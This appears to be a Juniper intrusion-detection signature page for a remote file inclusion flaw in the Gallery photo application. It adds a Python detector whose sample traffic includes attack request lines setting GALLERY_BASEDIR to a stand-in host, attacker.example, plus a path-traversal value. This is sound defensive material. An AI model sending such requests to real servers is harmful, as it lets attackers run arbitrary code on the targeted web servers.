Juniper Networks

Signature Detail

Security Intelligence Center

Short Name

HTTP:PHP:GALLERY:HTTP-VARS

Severity

High

Recommended

No

Recommended Action

Drop

Category

HTTP

Keywords

PHP Gallery HTTP_VARS In URL

Release Date

2004/02/04

Update Number

1213

Supported Platforms

di-5.3+, idp-4.0+, isg-3.0+, j-series-9.5+, mx-9.4+, srx-9.2+, srx-branch-9.4+, vsrx-12.1+

HTTP: PHP Gallery HTTP_VARS In URL


This signature detects attempts to exploit a known vulnerability in Gallery, a web-based photo management application. Gallery reads request data through the PHP variables HTTP_POST_VARS, HTTP_GET_VARS, HTTP_COOKIE_VARS, and HTTP_POST_FILES to pass values between pages, including the GALLERY_BASEDIR variable, which holds the base path from which Gallery's scripts include their other files. Because the client controls these variables, an attacker can supply a malicious value for GALLERY_BASEDIR and cause the affected scripts to include and execute arbitrary PHP code on the Gallery server with the privileges of the web server process.

Extended Description

Gallery is vulnerable to a remote file inclusion issue that may allow remote attackers to include arbitrary files hosted on servers they control. The issue is present in several of the PHP scripts shipped with Gallery. An attacker may exploit it by supplying the path of a file on a remote host as the value of the 'GALLERY_BASEDIR' parameter; the vulnerable script then loads and executes that file as PHP.
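The two descriptions above explain what the signature looks for but not how a request that trips it is shaped. The following Python is an added example written for this page, not Juniper's signature logic or Gallery's code. It assumes the attacker either sets GALLERY_BASEDIR directly in the query string or nests it inside one of the four named arrays (e.g. HTTP_POST_VARS[GALLERY_BASEDIR]=...), which is the reading of "HTTP_VARS In URL" used here; the request lines, host names and script paths are constructed for the example. It decodes the query string before matching so that URL-encoded brackets do not evade the check, flattens the nested form to the plain variable name, and flags whether the value points at a remote host (a confirmed remote file inclusion attempt) or is a local path.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request arrays named in the signature description; Gallery 1.x reads its input through these.
HTTP_VARS = ("HTTP_POST_VARS", "HTTP_GET_VARS", "HTTP_COOKIE_VARS", "HTTP_POST_FILES")
TARGET = "GALLERY_BASEDIR"           # the include base path an attacker wants to control
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Matches the nested form HTTP_POST_VARS[GALLERY_BASEDIR] (after URL decoding).
_NESTED = re.compile(r"^(%s)\[([^\]]*)\]$" % "|".join(HTTP_VARS))


def extract_params(query):
    """Decode a query string into (name, value, via) triples.

    'via' is the HTTP_*_VARS array a nested key was delivered through, or None
    when the parameter was set directly. Both shapes end up under the same name,
    so the caller only has to compare against TARGET once.
    """
    triples = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = _NESTED.match(name)
        if m:
            triples.append((m.group(2), value, m.group(1)))
        else:
            triples.append((name, value, None))
    return triples


def inspect_request(request_line):
    """Classify one HTTP request line ('METHOD target HTTP/x.y').

    Returns None when the request does not set GALLERY_BASEDIR, otherwise a dict
    describing the hit. Any client-supplied GALLERY_BASEDIR is treated as hostile
    (no legitimate browser sets it), matching the page's recommended action of
    dropping the request; 'remote' is True only when the value names a remote host.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    url = urlsplit(target)
    for name, value, via in extract_params(url.query):
        if name != TARGET:
            continue
        return {
            "method": method,
            "path": url.path,
            "via": via,                      # None or the HTTP_*_VARS array abused
            "value": value,
            "remote": value.lower().startswith(REMOTE_SCHEMES),
            "verdict": "drop",
        }
    return None


def scan(lines):
    """Run inspect_request over an iterable of request lines; return the hits."""
    hits = []
    for line in lines:
        hit = inspect_request(line)
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed sample traffic for this example (not captured data).
SAMPLE_REQUESTS = [
    "GET /gallery/view_album.php?set_albumName=holiday HTTP/1.1",
    "GET /gallery/index.php?GALLERY_BASEDIR=http://attacker.example/ HTTP/1.0",
    "GET /gallery/index.php?HTTP_POST_VARS%5BGALLERY_BASEDIR%5D=http%3A%2F%2Fattacker.example%2F HTTP/1.1",
    "GET /gallery/view_album.php?GALLERY_BASEDIR=../../tmp/ HTTP/1.1",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        kind = "remote include" if hit["remote"] else "local path"
        via = hit["via"] or "direct"
        print("%s %s  GALLERY_BASEDIR=%r  (%s, via %s)" % (hit["verdict"].upper(), hit["path"], hit["value"], kind, via))
```

Two points worth keeping in mind when turning this into a production rule. First, decoding must happen before matching: the third sample request carries the bracketed key and the URL in percent-encoded form, and a raw substring match on "GALLERY_BASEDIR=" would miss it. Second, a local-path value is still reported, because the scripts never expect this variable from the client at all; treating only remote URLs as hits would silently pass traversal-style values. Detection is a compensating control here; the actual fix is to run a Gallery version that no longer derives its include path from request variables.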

Affected Products

  • Bharat Mediratta Gallery 1.1.0
  • Bharat Mediratta Gallery 1.2.0
  • Bharat Mediratta Gallery 1.2.1
  • Bharat Mediratta Gallery 1.2.1 p1
  • Bharat Mediratta Gallery 1.2.2
  • Bharat Mediratta Gallery 1.2.3
  • Bharat Mediratta Gallery 1.2.4
  • Bharat Mediratta Gallery 1.2.5
  • Bharat Mediratta Gallery 1.3.0

References

  • BugTraq: 5375
  • CVE: CVE-2002-1412
  • URL: http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=107&sid=107
  • URL: http://www.securiteam.com/unixfocus/6S00H0U8KG.html
  • URL: http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=26325

Copyright © 1999-2010 Juniper Networks, Inc. All rights reserved.